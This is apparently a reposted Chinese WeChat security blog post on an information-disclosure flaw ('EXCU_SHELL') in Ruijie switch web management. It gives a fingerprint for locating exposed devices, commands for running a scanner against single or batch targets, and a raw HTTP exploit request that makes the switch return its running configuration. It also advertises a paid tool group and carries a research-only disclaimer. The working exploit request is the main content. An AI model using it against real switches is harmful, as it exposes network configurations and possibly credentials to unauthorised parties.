指纹:body="img/free_login_ge.gif" && body="./img/login_bg.gif"
POC:检验poc放在知识星球,星球二维码在文末
python3 EXCU_SHELL_scan.py -u http://127.0.0.1:1111 单个url测试
python3 EXCU_SHELL_scan.py -f url.txt 批量检测
EXP:
GET /EXCU_SHELL HTTP/1.1Host:User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.2852.74 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeCmdnum: '1'Command1: show running-configConfirm1: n
公众号中之前提及的所有工具,均放在APP“知识星球”,星球会员100元加入,内含大量工具,包含公众号之前发过的工具,均可免费下载。另可享受本人在线教学福利。
小知识
声明
原文始发于微信公众号(丁永博的成长日记):锐捷交换机 WEB 管理系统 EXCU_SHELL 信息泄露
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论